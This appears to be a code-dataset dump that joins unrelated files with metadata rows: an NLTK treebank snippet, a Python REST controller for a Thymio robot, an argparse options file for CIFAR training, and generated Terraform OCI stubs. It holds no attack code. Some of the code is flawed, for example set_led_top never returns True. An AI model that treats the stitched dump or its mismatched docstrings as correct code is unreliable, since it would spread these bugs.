| 53.714286 | 89 | 0.875 | 44 | 376 | 7.477273 | 0.409091 | 0.218845 | 0.364742 | 0.237082 | 0.273556 | 0.273556 | 0 | 0 | 0 | 0 | 0 | 0.011461 | 0.071809 | 376 | 6 | 90 | 62.666667 | 0.931232 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
88579d03c9a057d5a7595c11cacd542ebfa682e3 | 125 | py | Python | Module 3/Chapter 5/ch5_6.py | PacktPublishing/Natural-Language-Processing-Python-and-NLTK | bb7fd9a3071b4247d13accfbf0a48eefec76e925 | [
"MIT"
] | 50 | 2016-12-11T13:49:01.000Z | 2022-03-20T19:47:55.000Z | Module 3/Chapter 5/ch5_6.py | PacktPublishing/Natural-Language-Processing-Python-and-NLTK | bb7fd9a3071b4247d13accfbf0a48eefec76e925 | [
"MIT"
] | null | null | null | Module 3/Chapter 5/ch5_6.py | PacktPublishing/Natural-Language-Processing-Python-and-NLTK | bb7fd9a3071b4247d13accfbf0a48eefec76e925 | [
"MIT"
] | 40 | 2017-06-14T14:02:48.000Z | 2021-10-14T06:25:00.000Z | import nltk
from nltk.corpus import sinica_treebank
print(sinica_treebank.sents())
print(sinica_treebank.parsed_sents()[27])
# thymio/thymiolib/__init__.py (heia-fr/thymio-captain, Apache-2.0 license)
import httplib2
import json
"""
@author: Damien Goetschi
@organization: Haute ecole d'ingenierie et d'architecture Fribourg
"""
class ThymioController:
"""
This class allows the user to control all leds, motors and sensors of a thymio
"""
__errorConnReset = "Error: Connection reset by peer. Please check the Thymio is well connected to the Raspberry Pi"
__errorConnRefused = "Error: Connection refused. Please check the Thymio is well connected to the Raspberry Pi or " \
"you entered the correct IP address"
__errorNotFound = "Server not found. Please check you entered the correct IP address"
__errorNoRoute = "No route to host. Please check you entered the correct IP address"
__ip = "localhost"
"""IP address on which asebahttp runs"""
__port = 3000
"""port on which asebahttp runs"""
__rootUrl = ""
"""URL build with ip and port"""
__debug = False
"""Debug mode"""
__http = httplib2.Http()
"""Http objet to call RESTful API"""
def __init__(self, ip="localhost", port=3000, debug=False):
"""
Create a thymio controller with an ip address and a given port
@param ip: asebahttp's ip
@type ip: string
@param port: asebahttp's port
@type port: int
@param debug: true if debug mode is active (print detail about errors)
@type debug: bool
"""
self.__ip = ip
self.__port = port
self.__debug = debug
self.__rootUrl = "http://{0}:{1}/nodes/thymio-II/".format(self.__ip, self.__port)
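The constructor only stores its arguments and builds the Aseba REST root URL, so the URL format can be checked in isolation (the IP below is an example value; no real robot is contacted):

```python
# Example values only, mirroring the __init__ format string above.
ip, port = "192.168.0.42", 3000
root_url = "http://{0}:{1}/nodes/thymio-II/".format(ip, port)
```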
def get_motors(self):
"""Get real speed for each motor
This returns the speed of both thymio motors.
@return: A list of two values containing the left and right motor values
@rtype: list of int [left, right] (empty list in case of error)
@note: \n
>>> t.get_motors()
[-52, 137]
"""
try:
response, content = self.__http.request(self.__rootUrl+"motor.left.speed", "GET")
left = (json.loads(content.decode('utf-8'))[0])
response, content = self.__http.request(self.__rootUrl+"motor.right.speed", "GET")
right = (json.loads(content.decode('utf-8'))[0])
return [left, right]
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return []
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return []
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return []
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return []
def set_motors(self, left, right):
"""Change target speed for each motor
This changes the speed of both motors and return True on success.
@param left: Left motor speed
@param right: Right motor speed
@type left: int (between -500 and 500)
@type right: int (between -500 and 500)
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> t.set_motors(500, -500)
True
>>> t.set_motors(-1000, 0)
False
>>> t.set_motors(0, 0)
True
"""
if type(left)!=int or type(right)!=int:
if self.__debug:
print("Error: wrong type\n"+self.set_motors.__doc__)
return False
if left > 500 or left < -500 or right > 500 or right < -500:
if self.__debug:
print("Error: params not in range\n"+self.set_motors.__doc__)
return False
try:
self.__http.request(self.__rootUrl+"eventMotors/{0}/{1}".format(left,right), "POST")
return True
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
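set_motors rejects out-of-range speeds outright and returns False. A caller that prefers clamping to the ±500 range can pre-process its values; this helper is a convenience sketch, not part of the class:

```python
def clamp_speed(value, limit=500):
    """Clamp a requested motor speed into the Thymio's [-limit, limit] range."""
    return max(-limit, min(limit, int(value)))
```

With clamped inputs, `t.set_motors(clamp_speed(left), clamp_speed(right))` can no longer fail the range check.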
def get_prox_h(self):
"""Get values for horizontal ir sensor.
This returns the values of each horizontal ir sensor.
@return: A value between 0 and 5000 for each of 7 sensors.
The higher the value, the closer an object
[0-4]: front sensors left to right
[5-6]: back sensors left to right
@rtype: list of int (empty list in case of error)
@note: \n
>>> t.get_prox_h()
[0, 2701, 2579, 2489, 0, 3632, 4490]
"""
try:
response, content = self.__http.request(self.__rootUrl+"prox.horizontal")
return json.loads(content.decode('utf-8'))
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return []
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return []
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return []
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return []
def get_prox_v(self):
"""Get values for vertical (ground) ir sensor.
This returns the values of each vertical ir sensor.
@return: A value between 0 and 1000 for each of 2 sensors.
The higher the value, the lighter the ground.
[0-1]: ground sensors left to right
@rtype: list of int (empty list in case of error)
@note: \n
>>> t.get_prox_v()
[980,240]
"""
try:
response, content = self.__http.request(self.__rootUrl+"prox.ground.delta", "GET")
return json.loads(content.decode('utf-8'))
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return []
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return []
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return []
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return []
def get_acc(self):
"""Get values of accelerometer.
This returns the values of each axis.
@return: A value for each of 3 axis.
[roll,pitch,yaw]
@rtype: list of int (empty list in case of error)
@note: \n
>>> t.get_acc()
[1,-1,23]
"""
try:
response, content = self.__http.request(self.__rootUrl+"acc")
return json.loads(content.decode('utf-8'))
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return []
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return []
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return []
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return []
def get_button_backward(self):
"""Get value of backward button.
This returns the current state of the button
@return: 1 if button is pressed, 0 otherwise; -1 in case of error
@rtype: int
@note: \n
>>> t.get_button_backward()
0
"""
try:
response, content = self.__http.request(self.__rootUrl+"button.backward")
return json.loads(content.decode('utf-8'))[0]
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return -1
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return -1
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return -1
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return -1
def get_button_center(self):
"""Get value of center button.
This returns the current state of the button
@return: 1 if button is pressed, 0 otherwise; -1 in case of error
@rtype: int
@note: \n
>>> t.get_button_center()
1
"""
try:
response, content = self.__http.request(self.__rootUrl+"button.center")
return json.loads(content.decode('utf-8'))[0]
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return -1
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return -1
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return -1
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return -1
def get_button_forward(self):
"""Get value of forward button.
This returns the current state of the button
@return: 1 if button is pressed, 0 otherwise; -1 in case of error
@rtype: int
@note: \n
>>> t.get_button_forward()
0
"""
try:
response, content = self.__http.request(self.__rootUrl+"button.forward")
return json.loads(content.decode('utf-8'))[0]
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return -1
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return -1
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return -1
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return -1
def get_button_left(self):
"""Get value of left button.
This returns the current state of the button
@return: 1 if button is pressed, 0 otherwise; -1 in case of error
@rtype: int
@note: \n
>>> t.get_button_left()
1
"""
try:
response, content = self.__http.request(self.__rootUrl+"button.left")
return json.loads(content.decode('utf-8'))[0]
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return -1
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return -1
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return -1
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return -1
def get_button_right(self):
"""Get value of right button.
This returns the current state of the button
@return: 1 if button is pressed, 0 otherwise; -1 in case of error
@rtype: int
@note: \n
>>> t.get_button_right()
0
"""
try:
response, content = self.__http.request(self.__rootUrl+"button.right")
return json.loads(content.decode('utf-8'))[0]
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return -1
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return -1
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return -1
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return -1
def get_mic_intensity(self):
"""Get value of mic.
This returns the intensity of mic.
@return: The mic intensity, between 0 and 255; -1 in case of error
@rtype: int
@note: \n
>>> t.get_mic_intensity()
129
"""
try:
response, content = self.__http.request(self.__rootUrl+"mic.intensity")
return json.loads(content.decode('utf-8'))[0]
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return -1
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return -1
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return -1
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return -1
def get_temperature(self):
"""Get value of temperature.
This returns the temperature of sensor
@return: Temperature in tenths of a degree Celsius; -1 in case of error
@rtype: int
@note: \n
>>> t.get_temperature()
312
"""
try:
response, content = self.__http.request(self.__rootUrl+"temperature")
return json.loads(content.decode('utf-8'))[0]
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return -1
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return -1
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return -1
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return -1
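get_temperature returns tenths of a degree Celsius, per the docstring above; converting the raw value to degrees (and, if wanted, Fahrenheit) is a one-liner:

```python
def to_celsius(tenths):
    """Convert the raw sensor value (tenths of a degree Celsius) to degrees."""
    return tenths / 10.0

def to_fahrenheit(tenths):
    """Same raw value, expressed in degrees Fahrenheit."""
    return to_celsius(tenths) * 9.0 / 5.0 + 32.0
```

So the docstring's example reading of 312 corresponds to 31.2 °C.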
def get_rc_last_command(self):
"""Get last rc command received.
@return: Command number (between 0 and 127); -1 in case of error
@rtype: int
@note: \n
>>> t.get_rc_last_command()
80
"""
try:
self.__http.request(self.__rootUrl+"new_rc/0","POST")
response, content = self.__http.request(self.__rootUrl+"rc5.command")
return json.loads(content.decode('utf-8'))[0]
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return -1
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return -1
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return -1
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return -1
def get_rc_last_address(self):
"""Get last rc address received.
@return: Address number (between 0 and 31). -1 in case of error
@rtype: int
@note: \n
>>> t.get_rc_last_address()
0
"""
try:
self.__http.request(self.__rootUrl+"new_rc/0","POST")
response, content = self.__http.request(self.__rootUrl+"rc5.address")
return json.loads(content.decode('utf-8'))[0]
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return -1
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return -1
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return -1
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return -1
def get_rc_new(self):
"""Get if new rc code received.
@return: 1 if new rc code received, 0 otherwise; -1 in case of error
@rtype: int
@note: \n
>>> t.get_rc_new()
1
"""
try:
response, content = self.__http.request(self.__rootUrl+"new_rc")
return json.loads(content.decode('utf-8'))[0]
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return -1
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return -1
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return -1
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return -1
def set_sound_system(self,sound):
"""Set a sound system
@param sound: sound to play:
-1: stop playing sound
0: startup sound
1: shutdown sound
2: arrow button sound
3: central button sound
4: free-fall (scary) sound
5: collision sound
6: target ok for friendly behaviour
7: target detect for friendly behaviour
@type sound: int
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> t.set_sound_system(-1)
True
>>> t.set_sound_system(20)
False
"""
if type(sound)!=int:
if self.__debug:
print("Error: wrong type\n"+self.set_sound_system.__doc__)
return False
if sound > 7 or sound < -1:
if self.__debug:
print("Error: params not in range\n"+self.set_sound_system.__doc__)
return False
try:
response, content = self.__http.request(self.__rootUrl+"eventSoundSystem/{0}".format(sound))
return True
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
def set_sound_freq(self,freq,ds):
"""Set a sound frequency
@param freq: sound frequency (Hz)
@type freq: float (between 0 and 7812.5)
@param ds: sound duration in 1/60s. Specifying a 0 duration plays the sound continuously and specifying a -1
duration stops the sound.
@type ds: float
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> t.set_sound_freq(200, 60)
True
"""
if not isinstance(freq, (int, float)) or not isinstance(ds, (int, float)):
if self.__debug:
print("Error: wrong type\n"+self.set_sound_freq.__doc__)
return False
if freq > 7812.5 or freq < 0 or ds < -1:
if self.__debug:
print("Error: params not in range\n"+self.set_sound_freq.__doc__)
return False
try:
response, content = self.__http.request(self.__rootUrl+"eventSoundFreq/{0}/{1}".format(freq,ds))
return True
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
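set_sound_freq caps frequencies at 7812.5 Hz. To play musical notes through it, the standard MIDI-to-frequency formula f = 440 · 2^((n−69)/12) can supply the frequency argument; the cap value below comes from the docstring above, and the helper itself is only a sketch:

```python
def midi_to_freq(note, max_freq=7812.5):
    """Frequency in Hz for a MIDI note number, capped at the Thymio's limit."""
    freq = 440.0 * 2.0 ** ((note - 69) / 12.0)
    return min(freq, max_freq)
```

For example, `t.set_sound_freq(midi_to_freq(69), 60.0)` would play concert A (440 Hz) for one second.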
def set_led_top(self,r,g,b):
"""Set color for led on top
@param r: value of red (0-32)
@type r: int
@param g: value of green (0-32)
@type g: int
@param b: value of blue (0-32)
@type b: int
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> t.set_led_top(10,0,32)
True
"""
if type(r)!=int or type(g)!=int or type(b)!=int:
if self.__debug:
print("Error: wrong type\n"+self.set_led_top.__doc__)
return False
if r > 32 or r < 0 or g > 32 or g < 0 or b > 32 or b < 0:
if self.__debug:
print("Error: params not in range\n"+self.set_led_top.__doc__)
return False
try:
response, content = self.__http.request(self.__rootUrl+"eventLedTop/{0}/{1}/{2}".format(r,g,b))
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
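The led setters expect channel values in 0-32 rather than the usual 8-bit 0-255 range; scaling a standard RGB triple down is straightforward (the helper name is illustrative, not part of the library):

```python
def rgb255_to_32(r, g, b):
    """Scale an 8-bit RGB triple into the Thymio's 0-32 led range."""
    return tuple(round(c * 32 / 255) for c in (r, g, b))
```

For instance, web-style magenta (255, 0, 128) becomes (32, 0, 16), suitable for set_led_top.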
def set_led_bottom_left(self,color):
"""Set color for led on bottom left
@param r: value of red (0-32)
@type r: int
@param g: value of green (0-32)
@type g: int
@param b: value of blue (0-32)
@type b: int
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> set_led_bottom_left(10,0,32)
True
"""
r = color[0]
g = color[1]
b = color[2]
if type(r)!=int or type(g)!=int or type(b)!=int:
if self.__debug:
print("Error: wrong type\n"+self.set_led_bottom_left.__doc__)
return False
if r > 32 or r < 0 or g > 32 or g < 0 or b > 32 or b < 0:
if self.__debug:
print("Error: params not in range\n"+self.set_led_bottom_left.__doc__)
return False
try:
response, content = self.__http.request(self.__rootUrl+"eventLedBotLeft/{0}/{1}/{2}".format(r,g,b))
return True
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
def set_led_bottom_right(self, color):
"""Set color for led on bottom right
@param r: value of red (0-32)
@type r: int
@param g: value of green (0-32)
@type g: int
@param b: value of blue (0-32)
@type b: int
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> set_led_bottom_right(10,0,32)
True
"""
r = color[0]
g = color[1]
b = color[2]
if type(r)!=int or type(g)!=int or type(b)!=int:
if self.__debug:
print("Error: wrong type\n"+self.set_led_bottom_right.__doc__)
return False
if r > 32 or r < 0 or g > 32 or g < 0 or b > 32 or b < 0:
if self.__debug:
print("Error: params not in range\n"+self.set_led_bottom_right.__doc__)
return False
try:
response, content = self.__http.request(self.__rootUrl+"eventLedBotRight/{0}/{1}/{2}".format(r,g,b))
return True
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
def set_led_temp(self, color):
"""Set color for temperature led on right
@param r: value of red (0-32)
@type r: int
@param b: value of blue (0-32)
@type b: int
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> set_led_temp(10,32)
True
"""
r = color[0]
b = color[1]
if type(r)!=int or type(b)!=int:
if self.__debug:
print("Error: wrong type\n"+self.set_led_temp.__doc__)
return False
if r > 32 or r < 0 or b > 32 or b < 0:
if self.__debug:
print("Error: params not in range\n"+self.set_led_temp.__doc__)
return False
try:
response, content = self.__http.request(self.__rootUrl+"eventLedTemp/{0}/{1}".format(r, b))
return True
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
def set_led_sound(self, r):
"""Set color for sound led on left
@param r: value of red (0-32)
@type r: int
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> set_led_sound(20)
True
"""
if type(r)!=int:
if self.__debug:
print("Error: wrong type\n"+self.set_led_sound.__doc__)
return False
if r > 32 or r < 0:
if self.__debug:
print("Error: params not in range\n"+self.set_led_sound.__doc__)
return False
        try:
            response, content = self.__http.request(self.__rootUrl+"eventLedSound/{0}".format(r))
            return True
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
def set_led_button(self, leds):
"""Set color for led on top
@param leds: value for leds for each arrow button (forward, right, backward, left)
@type leds: int[4]
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> set_led_button([0, 32, 0, 32])
True
"""
if len(leds)!=4:
if self.__debug:
print("Error: incorrect number of values in array\n"+self.set_led_button.__doc__)
return False
for led in leds:
if type(led)!=int:
if self.__debug:
print("Error: wrong type\n"+self.set_led_button.__doc__)
return False
if led > 32 or led < 0:
if self.__debug:
print("Error: params not in range\n"+self.set_led_button.__doc__)
return False
        try:
            response, content = self.__http.request(self.__rootUrl+"eventLedButton/{0}/{1}/{2}/{3}".format(leds[0], leds[1], leds[2], leds[3]))
            return True
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
def set_led_circle(self, leds):
"""Set color for led circle on top
@param leds: value for leds for each part of circle (clockwise from forward)
@type leds: int[8]
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> set_led_circle([0, 32, 0, 32, 0, 32, 0, 32])
True
"""
if len(leds)!=8:
if self.__debug:
print("Error: incorrect number of values in array\n"+self.set_led_circle.__doc__)
return False
for led in leds:
if type(led)!=int:
if self.__debug:
print("Error: wrong type\n"+self.set_led_circle.__doc__)
return False
if led > 32 or led < 0:
if self.__debug:
print("Error: params not in range\n"+self.set_led_circle.__doc__)
return False
try:
self.__http.request(self.__rootUrl+"eventLedCircle/{0}/{1}/{2}/{3}/{4}/{5}/{6}/{7}".
format(leds[0], leds[1], leds[2], leds[3], leds[4], leds[5], leds[6], leds[7]))
return True
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
def set_led_prox_h(self, leds):
"""Set color for leds of horizontal proximity sensors
@param leds: value for leds for each proximity sensor (0-5: front left to right, 6-7 back left to right)
@type leds: int[8]
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> set_led_prox_h([0, 0, 32, 32, 0, 0, 16, 16])
True
"""
if len(leds)!=8:
if self.__debug:
print("Error: incorrect number of values in array\n"+self.set_led_prox_h.__doc__)
return False
for led in leds:
if type(led)!=int:
if self.__debug:
print("Error: wrong type\n"+self.set_led_prox_h.__doc__)
return False
if led > 32 or led < 0:
if self.__debug:
print("Error: params not in range\n"+self.set_led_prox_h.__doc__)
return False
        try:
            self.__http.request(self.__rootUrl+"eventLedProxH/{0}/{1}/{2}/{3}/{4}/{5}/{6}/{7}".
                                format(leds[0], leds[1], leds[2], leds[3], leds[4], leds[5], leds[6], leds[7]))
            return True
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
def set_led_prox_v(self, leds):
"""Set color for leds of vertical proximity sensors
@param leds: value for leds for each proximity sensor (0: left, 1: right)
@type leds: int[2]
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> set_led_prox_v([32, 32])
True
"""
if len(leds)!=2:
if self.__debug:
print("Error: incorrect number of values in array\n"+self.set_led_prox_v.__doc__)
return False
for led in leds:
if type(led)!=int:
if self.__debug:
print("Error: wrong type\n"+self.set_led_prox_v.__doc__)
return False
if led > 32 or led < 0:
if self.__debug:
print("Error: params not in range\n"+self.set_led_prox_v.__doc__)
return False
        try:
            response, content = self.__http.request(self.__rootUrl+"eventLedProxV/{0}/{1}".format(leds[0], leds[1]))
            return True
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
def reset(self):
"""Set motors to 0 and turn off top and bottom leds
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> reset()
True
"""
        try:
            self.__http.request(self.__rootUrl+"eventReset")
            return True
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
# options.py (sudipansaha/cifarAndSvhnClassification)
"""
Code Author: Sudipan Saha.
"""
import argparse
import os


class options():
    """This class defines some options/arguments."""

    def __init__(self):
        """Reset the class; indicates the class hasn't been initialized."""
        self.initialized = False

    def initialize(self, parser):
        parser = argparse.ArgumentParser(description='PyTorch CIFAR10 Training')
        parser.add_argument('--dataset', default='cifar10', type=str, help='dataset')  ## dataset: cifar10/cifar100/svhn
        parser.add_argument('--lr', default='0.1', type=str, help='learning rate(s)')  ## different learning rates can be passed as a comma-separated string like '0.1,0.05'
        parser.add_argument('--epochs', default='100', type=str, help='epoch count(s)')  ## epochs corresponding to the learning rates can be passed as a comma-separated string like '100,50'
        parser.add_argument('--resume', '-r', action='store_true', help='resume from checkpoint')
        parser.add_argument('--checkpointPath', default='./checkpoint/', help='checkpoint path')  ## checkpoint path, where the trained model is stored
        parser.add_argument('--model', default='vgg16', help='network architecture: vgg16 / vgg19 / mobilenet_v2 / resnet18 / resnet34 / resnet50 / resnet101')
        parser.add_argument('--sgdMomentum', default=0.9, type=float, help='momentum for SGD optimizer')
        parser.add_argument('--sgdWeightDecay', default=5e-4, type=float, help='weight decay for SGD optimizer')
        parser.add_argument('--trainingBatchSize', default=64, type=int, help='training batch size')
        self.initialized = True
        return parser

    def parseOptions(self):
        """Parse the options."""
        parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
        parser = self.initialize(parser)
        opt = parser.parse_args()
        dataset = opt.dataset  ## valid values: cifar10/cifar100/svhn
        checkpointPath = opt.checkpointPath
        if not os.path.exists(checkpointPath):
            os.makedirs(checkpointPath)  ## create the checkpoint directory if it does not exist
        resumeTrainingBool = opt.resume  ## whether training is to be resumed from a checkpoint
        learningRates = [float(v) for v in opt.lr.split(',')]  ## one value or a schedule; np.float is deprecated, so plain float is used
        epochs = [int(v) for v in opt.epochs.split(',')]  ## one value or a schedule
        modelName = opt.model
        sgdMomentum = opt.sgdMomentum
        sgdWeightDecay = opt.sgdWeightDecay
        trainingBatchSize = opt.trainingBatchSize
        return dataset, checkpointPath, resumeTrainingBool, learningRates, epochs, modelName, sgdMomentum, sgdWeightDecay, trainingBatchSize
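`parseOptions` turns the comma-separated `--lr` and `--epochs` strings into parallel lists, so each learning rate is paired with an epoch count. A minimal reproduction of that parsing (variable names here are illustrative, not from the original file):

```python
lr_arg = "0.1,0.05"    # e.g. --lr 0.1,0.05
epochs_arg = "100,50"  # e.g. --epochs 100,50

learning_rates = [float(v) for v in lr_arg.split(",")]
epoch_counts = [int(v) for v in epochs_arg.split(",")]

# Pair each learning rate with its epoch count, forming a training schedule.
schedule = list(zip(learning_rates, epoch_counts))
print(schedule)  # [(0.1, 100), (0.05, 50)]
```

Passing the values as strings and splitting afterwards is what lets a single flag describe either one phase or a multi-phase schedule.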
# terrascript/resource/hashicorp/oci.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:23:14 UTC)
import terrascript
class oci_ai_anomaly_detection_ai_private_endpoint(terrascript.Resource):
pass
class oci_ai_anomaly_detection_data_asset(terrascript.Resource):
pass
class oci_ai_anomaly_detection_model(terrascript.Resource):
pass
class oci_ai_anomaly_detection_project(terrascript.Resource):
pass
class oci_analytics_analytics_instance(terrascript.Resource):
pass
class oci_analytics_analytics_instance_private_access_channel(terrascript.Resource):
pass
class oci_analytics_analytics_instance_vanity_url(terrascript.Resource):
pass
class oci_apigateway_api(terrascript.Resource):
pass
class oci_apigateway_certificate(terrascript.Resource):
pass
class oci_apigateway_deployment(terrascript.Resource):
pass
class oci_apigateway_gateway(terrascript.Resource):
pass
class oci_apm_apm_domain(terrascript.Resource):
pass
class oci_apm_synthetics_monitor(terrascript.Resource):
pass
class oci_apm_synthetics_script(terrascript.Resource):
pass
class oci_artifacts_container_configuration(terrascript.Resource):
pass
class oci_artifacts_container_image_signature(terrascript.Resource):
pass
class oci_artifacts_container_repository(terrascript.Resource):
pass
class oci_artifacts_generic_artifact(terrascript.Resource):
pass
class oci_artifacts_repository(terrascript.Resource):
pass
class oci_audit_configuration(terrascript.Resource):
pass
